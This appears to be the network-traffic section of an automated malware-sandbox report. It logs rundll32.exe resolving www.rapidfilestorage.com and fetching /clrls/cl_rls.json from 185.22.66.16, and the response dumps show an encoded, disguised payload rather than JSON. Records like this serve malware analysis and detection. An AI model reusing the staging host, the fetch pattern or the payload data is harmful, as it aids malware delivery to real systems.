Aug 31, 2024 22:05:15.081288099 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081294060 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081341982 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081348896 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081355095 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081367970 CEST4971080192.168.2.7185.22.66.16
Aug 31, 2024 22:05:15.081379890 CEST8049710185.22.66.16192.168.2.7
Aug 31, 2024 22:05:15.081425905 CEST4971080192.168.2.7185.22.66.16
Aug 31, 2024 22:05:15.081715107 CEST4971080192.168.2.7185.22.66.16
Aug 31, 2024 22:05:15.309556961 CEST4970980192.168.2.7185.22.66.16
Aug 31, 2024 22:05:15.312577963 CEST4971080192.168.2.7185.22.66.16
Aug 31, 2024 22:05:16.041946888 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:16.209732056 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:16.209826946 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:16.210118055 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:16.214895964 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003241062 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003253937 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003264904 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003359079 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.003359079 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.003782034 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003803015 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003859043 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.003859043 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.003895044 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003935099 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.003938913 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.003979921 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.004110098 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.004163027 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.004173994 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.004182100 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.004223108 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.008757114 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.008768082 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.008780003 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.008791924 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.008820057 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.008876085 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.009192944 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.009248972 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.173553944 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173573017 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173584938 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173645973 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.173645973 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.173686028 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173723936 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173734903 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.173739910 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.173784971 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.174433947 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174488068 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.174520016 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174530983 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174545050 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174556971 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174571037 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.174583912 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.174618959 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.174964905 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.174974918 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175040007 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.175077915 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175088882 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175103903 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175123930 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175134897 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175136089 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.175164938 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.175190926 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.175791979 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175837994 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.175947905 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175960064 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.175971031 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.176011086 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.176018000 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.176018000 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.176023960 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.176037073 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.176063061 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.176063061 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.176085949 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.178473949 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.178489923 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.178527117 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.178577900 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:17.178591967 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:17.178654909 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340380907 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340403080 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340425968 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340435028 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340454102 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340457916 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340473890 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340501070 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340502977 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340512037 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340523958 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340533972 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340558052 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340558052 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340560913 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340590954 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340626001 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.340857983 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.340909958 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345391035 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345402002 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345458984 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345458984 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345482111 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345491886 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345510006 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345520973 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345530987 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345530987 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345550060 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345571041 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345607996 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345668077 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.345696926 CEST8049711185.22.66.16192.168.2.7
Aug 31, 2024 22:05:18.345752001 CEST4971180192.168.2.7185.22.66.16
Aug 31, 2024 22:05:18.512429953 CEST4971180192.168.2.7185.22.66.16
TimestampSource PortDest PortSource IPDest IP
Aug 31, 2024 22:05:13.814819098 CEST5165053192.168.2.71.1.1.1
Aug 31, 2024 22:05:13.916145086 CEST53516501.1.1.1192.168.2.7
TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
Aug 31, 2024 22:05:13.814819098 CEST192.168.2.71.1.1.10x8c37Standard query (0)www.rapidfilestorage.comA (IP address)IN (0x0001)false
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Aug 31, 2024 22:05:13.916145086 CEST1.1.1.1192.168.2.70x8c37No error (0)www.rapidfilestorage.comenv-3936544.jcloud.kzCNAME (Canonical name)IN (0x0001)false
Aug 31, 2024 22:05:13.916145086 CEST1.1.1.1192.168.2.70x8c37No error (0)env-3936544.jcloud.kz185.22.66.16A (IP address)IN (0x0001)false
Aug 31, 2024 22:05:13.916145086 CEST1.1.1.1192.168.2.70x8c37No error (0)env-3936544.jcloud.kz185.22.66.15A (IP address)IN (0x0001)false
  • www.rapidfilestorage.com
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.749709185.22.66.16807792C:\Windows\SysWOW64\rundll32.exe
TimestampBytes transferredDirectionData
Aug 31, 2024 22:05:13.928718090 CEST116OUTGET /clrls/cl_rls.json HTTP/1.1
Host: www.rapidfilestorage.com
Connection: Keep-Alive
Cache-Control: no-cache
Aug 31, 2024 22:05:14.716859102 CEST1236INHTTP/1.1 200 OK
Server: openresty
Date: Sat, 31 Aug 2024 20:05:14 GMT
Content-Type: application/json
Content-Length: 50997
Connection: keep-alive
Set-Cookie: slb_route=1f6c580d83f149d0f16fd533578761ba; Path=/; Secure; HttpOnly
Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT
ETag: "66bb4169-c735"
Accept-Ranges: bytes
X-Resolver-IP: 185.22.66.16
X-Resolver-IP: 185.22.66.16
Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED]
Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
Aug 31, 2024 22:05:14.716875076 CEST1236INData Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30
Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:14.716881990 CEST448INData Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32
Data Ascii: S9[rS3YrS8\rS4WrS3QrS0VrS1TrS8XrS4SrS5PrS8[rS9XrS7^rS0QrS8PrS5]rS6QrS4YrS0UrS1QrS2SrS6YrS4OrS6PrS2[rS8^rS5]rS2ZrS6VsS2dsS3XsS4VsS2QrS6YrS9YrS1]rS1VrS7WrS3VrS1\rS3SrS2TrS5OrS9YrS8BrS0XrS2[rS9ZrS7PrS9XrS8UrS6\rS2WrS2QrS7ZrS7ZrS5^rS8ZrS1OrS7OrS7B
Aug 31, 2024 22:05:14.716887951 CEST1236INData Raw: 53 33 51 72 53 35 56 72 53 33 4f 72 53 30 5d 72 53 36 5c 72 53 30 57 72 53 33 5b 72 53 33 42 72 53 37 4f 72 53 37 57 72 53 35 55 72 53 36 53 72 53 31 5c 72 53 36 5d 72 53 30 58 72 53 38 53 72 53 38 59 72 53 34 5a 72 53 31 51 72 53 32 53 72 53 36
Data Ascii: S3QrS5VrS3OrS0]rS6\rS0WrS3[rS3BrS7OrS7WrS5UrS6SrS1\rS6]rS0XrS8SrS8YrS4ZrS1QrS2SrS6BrS9[rS0\rS6TrS0VsS2dsS8XsS5VsS1QrS6^rS0UrS8SrS1SrS3BrS3QrS2PrS0^rS5YrS0UrS2ZrS0SrS3PrS2UrS5QrS6SrS4]rS1TrS4ZrS5\rS9[rS9VrS1OrS2YrS8XrS7OrS4]rS1PrS7[rS4\rS5PrS1V
Aug 31, 2024 22:05:14.716892958 CEST1236INData Raw: 53 38 51 72 53 37 56 72 53 38 58 72 53 37 56 73 53 32 64 73 53 31 58 73 53 38 56 73 53 30 50 72 53 38 5a 72 53 36 50 72 53 35 5e 72 53 33 56 72 53 32 4f 72 53 31 53 72 53 33 50 72 53 30 58 72 53 37 50 72 53 35 5e 72 53 30 59 72 53 33 42 72 53 37
Data Ascii: S8QrS7VrS8XrS7VsS2dsS1XsS8VsS0PrS8ZrS6PrS5^rS3VrS2OrS1SrS3PrS0XrS7PrS5^rS0YrS3BrS7UrS1SrS7PrS5UrS2OrS0^rS0]rS8OrS9\rS8\rS6VrS0VrS0\rS2[rS4BrS5\rS9ZrS7XrS6]rS4VsS5dsS1XsS5VsS4PrS5ZrS1]rS4]rS1[rS1]rS9YrS6YrS2\rS1YrS6SrS8[rS6TrS0WrS4XrS5OrS6QrS2B
Aug 31, 2024 22:05:14.716900110 CEST448INData Raw: 53 31 5c 72 53 34 50 72 53 32 5d 72 53 30 59 72 53 34 5e 72 53 31 4f 72 53 38 5c 72 53 33 51 72 53 30 5b 72 53 38 58 72 53 33 54 72 53 35 53 72 53 39 5c 72 53 34 5d 72 53 36 5e 72 53 32 5a 72 53 32 5a 72 53 30 50 72 53 35 56 73 53 30 64 73 53 37
Data Ascii: S1\rS4PrS2]rS0YrS4^rS1OrS8\rS3QrS0[rS8XrS3TrS5SrS9\rS4]rS6^rS2ZrS2ZrS0PrS5VsS0dsS7XsS4VsS0OrS9PrS4ZrS1\rS0UrS1YrS3PrS7OrS2PrS2SrS1OrS4YrS8YrS0OrS1QrS3YrS5ZrS7WrS8UrS4TrS6YrS2UrS5UrS6TrS5YrS4UrS1UrS1^rS3VrS9\rS2YrS9^rS3VsS2dsS7XsS1VsS2OrS2UrS0Q
Aug 31, 2024 22:05:14.716943979 CEST1236INData Raw: 53 31 5e 72 53 30 5b 72 53 33 51 72 53 35 42 72 53 36 57 72 53 33 56 72 53 34 5d 72 53 30 4f 72 53 34 53 72 53 34 58 72 53 35 5b 72 53 35 5c 72 53 38 5d 72 53 38 5a 72 53 33 56 73 53 31 64 73 53 36 58 73 53 32 56 73 53 37 4f 72 53 34 5a 72 53 36
Data Ascii: S1^rS0[rS3QrS5BrS6WrS3VrS4]rS0OrS4SrS4XrS5[rS5\rS8]rS8ZrS3VsS1dsS6XsS2VsS7OrS4ZrS6QrS7OrS3QrS2OrS0OrS4SrS3TrS8YrS5]rS3^rS4ZrS5TrS6BrS3OrS6PrS9TrS6\rS3]rS7YrS7YrS3QrS7WrS5ZrS9UrS6QrS4SrS8OrS0SrS1[rS8\rS7VsS3dsS7XsS0VsS5OrS6ZrS3PrS3OrS7QrS6WrS6O
Aug 31, 2024 22:05:14.716949940 CEST224INData Raw: 53 31 55 72 53 39 53 72 53 34 5a 72 53 32 5d 72 53 33 58 72 53 30 56 72 53 38 54 72 53 33 56 72 53 33 5d 72 53 34 5c 72 53 32 55 72 53 38 59 72 53 30 5e 72 53 35 58 72 53 39 55 72 53 34 59 72 53 30 50 72 53 30 58 72 53 34 5c 72 53 31 55 72 53 35
Data Ascii: S1UrS9SrS4ZrS2]rS3XrS0VrS8TrS3VrS3]rS4\rS2UrS8YrS0^rS5XrS9UrS4YrS0PrS0XrS4\rS1UrS5]rS7TrS7VrS3WrS6[rS6XrS0VrS7ZrS9^rS8VsS8dsS8XsS8VsS2OrS8[rS3ZrS1UrS1OrS2\rS9SrS4BrS8ZrS6PrS2BrS6BrS6XrS2BrS6QrS5[rS0WrS6UrS4YrS2^rS9QrS6YrS8Or
Aug 31, 2024 22:05:14.717020988 CEST1236INData Raw: 53 32 5a 72 53 38 5a 72 53 33 53 72 53 37 53 72 53 36 53 72 53 34 4f 72 53 33 5d 72 53 35 58 72 53 35 50 72 53 38 56 73 53 36 64 73 53 33 58 73 53 33 56 73 53 38 4f 72 53 39 42 72 53 34 50 72 53 32 53 72 53 33 5a 72 53 35 42 72 53 35 51 72 53 38
Data Ascii: S2ZrS8ZrS3SrS7SrS6SrS4OrS3]rS5XrS5PrS8VsS6dsS3XsS3VsS8OrS9BrS4PrS2SrS3ZrS5BrS5QrS8^rS2TrS7TrS3SrS3]rS6SrS1[rS5OrS6]rS2\rS4YrS4SrS6TrS5ZrS5QrS6^rS8SrS7ZrS7]rS6QrS1UrS4]rS6TrS7TrS2[rS9VsS6dsS5XsS4VsS9VrS9QrS7QrS5\rS2SrS5^rS9BrS3OrS2BrS4WrS1XrS5X
Aug 31, 2024 22:05:14.717060089 CEST1236INData Raw: 53 33 51 72 53 35 5d 72 53 31 42 72 53 37 57 72 53 30 5b 72 53 31 53 72 53 38 5d 72 53 33 57 72 53 38 5d 72 53 35 5c 72 53 31 5d 72 53 33 42 72 53 34 54 72 53 35 5a 72 53 36 54 72 53 35 42 72 53 31 50 72 53 36 53 72 53 34 55 72 53 36 56 72 53 31
Data Ascii: S3QrS5]rS1BrS7WrS0[rS1SrS8]rS3WrS8]rS5\rS1]rS3BrS4TrS5ZrS6TrS5BrS1PrS6SrS4UrS6VrS1BrS6]rS4TrS9]rS6VsS8dsS4XsS5VsS5VrS0XrS4ZrS9SrS3YrS8QrS7ZrS1[rS0]rS8XrS7WrS6QrS5PrS1XrS2VrS9[rS3VrS8^rS7UrS5]rS0ZrS6\rS3ZrS6PrS4\rS9PrS8TrS3OrS6[rS1]rS6QrS3]rS0V
Aug 31, 2024 22:05:14.721767902 CEST1236INData Raw: 53 34 55 72 53 35 5b 72 53 32 5d 72 53 39 56 73 53 31 64 73 53 32 58 73 53 35 56 73 53 32 56 72 53 36 42 72 53 38 56 72 53 30 5d 72 53 33 5a 72 53 36 54 72 53 31 5b 72 53 30 4f 72 53 37 59 72 53 31 5e 72 53 31 5c 72 53 30 55 72 53 32 57 72 53 34
Data Ascii: S4UrS5[rS2]rS9VsS1dsS2XsS5VsS2VrS6BrS8VrS0]rS3ZrS6TrS1[rS0OrS7YrS1^rS1\rS0UrS2WrS4UrS6OrS6TrS6XrS7SrS7YrS4]rS1XrS9VrS7UrS4OrS7WrS1QrS7OrS5ZrS8TrS2PrS8UrS9OrS9VsS6dsS5XsS1VsS1UrS4QrS6ZrS5UrS9PrS0QrS8]rS3YrS2[rS9BrS4VrS7ZrS1UrS2TrS9\rS9VrS4\rS2]


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.749710185.22.66.16807816C:\Windows\SysWOW64\rundll32.exe
TimestampBytes transferredDirectionData
Aug 31, 2024 22:05:13.934108019 CEST116OUTGET /clrls/cl_rls.json HTTP/1.1
Host: www.rapidfilestorage.com
Connection: Keep-Alive
Cache-Control: no-cache
Aug 31, 2024 22:05:14.733997107 CEST1236INHTTP/1.1 200 OK
Server: openresty
Date: Sat, 31 Aug 2024 20:05:14 GMT
Content-Type: application/json
Content-Length: 50997
Connection: keep-alive
Set-Cookie: slb_route=44fec3a2d4e8f0a420dbe578a10a780f; Path=/; Secure; HttpOnly
Last-Modified: Tue, 13 Aug 2024 11:20:09 GMT
ETag: "66bb4169-c735"
Accept-Ranges: bytes
X-Resolver-IP: 185.22.66.16
X-Resolver-IP: 185.22.66.16
Data Raw: 2d 47 72 53 38 56 73 53 36 51 72 53 33 45 72 53 37 46 72 53 35 5b 72 53 37 7a 71 53 32 45 72 53 35 5c 72 53 34 56 73 53 34 4e 73 53 32 58 73 53 39 47 72 53 35 56 73 53 32 57 72 53 35 56 73 53 30 4e 73 53 37 58 73 53 33 61 71 53 35 56 73 53 36 59 71 53 34 5a 72 53 36 45 72 53 30 46 72 53 37 56 72 53 31 5b 72 53 35 43 72 53 38 5c 72 53 36 60 71 53 36 59 72 53 32 5d 72 53 32 55 72 53 37 56 73 53 35 64 73 53 31 58 73 53 32 56 73 53 33 63 71 53 37 60 71 53 37 70 71 53 37 5b 72 53 33 43 72 53 34 5c 72 53 33 5e 72 53 31 5b 72 53 33 51 72 53 32 56 72 53 36 55 72 53 35 7a 71 53 39 56 73 53 36 64 73 53 39 58 73 53 32 56 73 53 35 45 72 53 30 6a 71 53 35 51 72 53 31 7a 71 53 30 56 73 53 34 64 73 53 34 58 73 53 34 56 73 53 32 5e 73 53 32 49 72 53 39 4f 72 53 37 6b 71 53 31 45 72 53 31 46 72 53 38 5b 72 53 37 78 71 53 37 51 72 53 31 45 72 53 31 5c 72 53 33 4f 72 53 33 5a 72 53 37 65 71 53 36 56 73 53 31 64 73 53 31 58 73 53 38 56 73 53 30 44 72 53 31 43 72 53 39 56 72 53 32 7a 71 53 30 44 72 53 31 51 72 53 38 5a [TRUNCATED]
Data Ascii: -GrS8VsS6QrS3ErS7FrS5[rS7zqS2ErS5\rS4VsS4NsS2XsS9GrS5VsS2WrS5VsS0NsS7XsS3aqS5VsS6YqS4ZrS6ErS0FrS7VrS1[rS5CrS8\rS6`qS6YrS2]rS2UrS7VsS5dsS1XsS2VsS3cqS7`qS7pqS7[rS3CrS4\rS3^rS1[rS3QrS2VrS6UrS5zqS9VsS6dsS9XsS2VsS5ErS0jqS5QrS1zqS0VsS4dsS4XsS4VsS2^sS2IrS9OrS7kqS1ErS1FrS8[rS7xqS7QrS1ErS1\rS3OrS3ZrS7eqS6VsS1dsS1XsS8VsS0DrS1CrS9VrS2zqS0DrS1QrS8ZrS1YrS5FrS3BrS0VsS9dsS3XsS2VsS0]qS0UrS0PrS9ZqS5ErS7^rS8UrS1zqS9VsS6dsS7XsS3VsS2uqS4\rS4UrS7FrS8QrS0PrS9PrS1UrS0zqS1VsS7dsS2XsS9VsS6yqS6]rS3VrS9TrS1zqS3WrS5VsS8dsS0XsS9VsS1wqS7YrS3OrS0zqS3[rS1yqS9[rS1TrS5FrS9XsS5^qS2YrS8yqS8ErS5QrS9^rS6XsS2YqS5FrS8ErS0VrS6YrS5[rS6VsS6gqS6dsS0XsS6VsS2DrS9VsS6NsS6XsS6aqS8VsS3^sS6YqS4ZrS9ErS9FrS2VrS0[rS4CrS6\rS1`qS6YrS1]rS0UrS4VsS3gqS4MrS3dsS5XsS6VsS2OrS5ZrS9zqS7[rS8]rS6YrS4ErS9]rS6yqS9VsS2NsS6XsS3aqS1VsS1QrS0QrS6QrS8QrS1QrS5VrS9SrS5UrS6BrS6XrS3WrS4VrS7TrS4TrS6ZrS8XrS5PrS8WrS3Tr
Aug 31, 2024 22:05:14.734071970 CEST1236INData Raw: 53 37 58 72 53 37 53 72 53 30 5c 72 53 31 5c 72 53 38 54 72 53 36 54 72 53 33 5c 72 53 35 54 72 53 34 4f 72 53 39 54 72 53 37 54 72 53 39 50 72 53 31 53 72 53 31 56 73 53 33 64 73 53 32 58 73 53 32 56 73 53 33 51 72 53 35 51 72 53 39 51 72 53 30
Data Ascii: S7XrS7SrS0\rS1\rS8TrS6TrS3\rS5TrS4OrS9TrS7TrS9PrS1SrS1VsS3dsS2XsS2VsS3QrS5QrS9QrS0QrS7QrS4UrS0XrS6QrS4SrS5ZrS2\rS5PrS5OrS4XrS8YrS0^rS4YrS1\rS0VrS4BrS3WrS7SrS0]rS1OrS8]rS1VrS4TrS4^rS2BrS8SrS1XrS5TrS7VsS1dsS2XsS3VsS9QrS4QrS7QrS5QrS6QrS1BrS7VrS9O
Aug 31, 2024 22:05:14.734078884 CEST1236INData Raw: 53 39 5b 72 53 33 59 72 53 38 5c 72 53 34 57 72 53 33 51 72 53 30 56 72 53 31 54 72 53 38 58 72 53 34 53 72 53 35 50 72 53 38 5b 72 53 39 58 72 53 37 5e 72 53 30 51 72 53 38 50 72 53 35 5d 72 53 36 51 72 53 34 59 72 53 30 55 72 53 31 51 72 53 32
